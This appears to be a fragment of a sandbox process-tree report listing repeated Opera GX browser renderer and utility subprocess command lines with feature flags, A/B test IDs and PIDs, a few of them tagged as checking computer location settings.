C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=9264,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9240 /prefetch:12⤵PID:4208
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=7548,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:12⤵PID:8124
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7944,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8948 /prefetch:82⤵PID:1368
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=9660,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6216 /prefetch:12⤵PID:6912
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=6284,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8700 /prefetch:12⤵PID:6664
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=9508,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:22⤵PID:10140
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=6404,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9820 /prefetch:12⤵PID:8188
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=9644,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8904 /prefetch:12⤵PID:11912
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=6896,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8940 /prefetch:12⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=9080,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:12⤵
- Checks computer location settings
PID:6164
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=8784,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8820 /prefetch:12⤵PID:5996
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=9864,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:12⤵PID:11036
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=9172,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7432 /prefetch:12⤵
- Checks computer location settings
PID:11776
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=9368,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8676 /prefetch:12⤵PID:4416
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=6868,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6828 /prefetch:12⤵
- Checks computer location settings
PID:5236
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=8744,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7020 /prefetch:12⤵PID:6416
-
-
